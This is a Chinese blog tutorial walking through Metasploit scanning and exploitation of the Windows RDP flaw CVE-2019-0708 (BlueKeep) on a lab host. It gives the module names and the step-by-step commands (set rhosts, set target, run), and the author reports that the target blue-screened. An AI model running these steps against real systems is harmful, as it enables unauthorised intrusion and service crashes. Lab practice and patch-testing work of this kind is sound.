Metasploit -- CVE-2019-0708漏洞检测及利用

“医生,我得了严重的抑郁症,你能给我看看吗” “我们这有全市最搞笑的小丑,他应该能治好你的病” “医生,我就是那个小丑!”

----  网易云热评

一、漏洞简介

Windows系列服务器于2019年5月15号, 被爆出高危漏洞, 该漏洞影响范围较广, windows 2003、windows 2008、windows 2008R 2、windowsxp等系统都会遭到攻击,该服务器漏洞利用方式是通过远程桌面端口3389, RDP协议进行攻击的。CVE-2019-0708漏洞是通过检查用户的身份认证,导致可以绕过认证, 不用任何的交互, 直接通过rdp协议进行连接发送恶意代码执行命令到服务器中去。这个漏洞是今年来说危害严重性最大的漏洞,换句话说,该漏洞是“可传播的”,这意味着任何利用该漏洞的恶意软件都可能从受影响的计算机传播到受影响的计算机,就像2017年Wanna Cry恶意软件在全球蔓延一样, 跟之前的勒索,永恒之蓝病毒差不多。

 

二、漏洞检测

1、打开Metasploit,搜索CVE-2019-0708

2、选择auxiliary/scanner/rdp/cve_2019_0708_bluekeep,检测漏洞是否存在

3、查看需要设置的参数show options

Metasploit -- CVE-2019-0708漏洞检测及利用_第1张图片

4、设置目标主机ip set rhosts 192.168.1.129

5、run,检测出现The target is vulnerable,目标很脆弱,说明存在漏洞

 

三、漏洞利用

1、选择攻击模块exploit/windows/rdp/cve_2019_0708_bluekeep_rce

2、查看攻击目标的环境show targets

Metasploit -- CVE-2019-0708漏洞检测及利用_第2张图片

3、设置模块需要的环境 set target 5

4、查看模块需要的参数 show options

Metasploit -- CVE-2019-0708漏洞检测及利用_第3张图片

5、设置攻击目标ip set rhosts 192.168.1.129

6、run,攻击

Metasploit -- CVE-2019-0708漏洞检测及利用_第4张图片

 

7、目标主机出现蓝屏

Metasploit -- CVE-2019-0708漏洞检测及利用_第5张图片

总结,理论上应该就取得了目标主机的shell,但是我的却是蓝屏,网上有的说多试几次就好,有的说是设置的target问题,都试过了,但是我最终还是没能成功。。。。

禁止非法,后果自负

欢迎关注公众号:web安全工具库

Metasploit -- CVE-2019-0708漏洞检测及利用_第6张图片

 

你可能感兴趣的:(web安全工具库)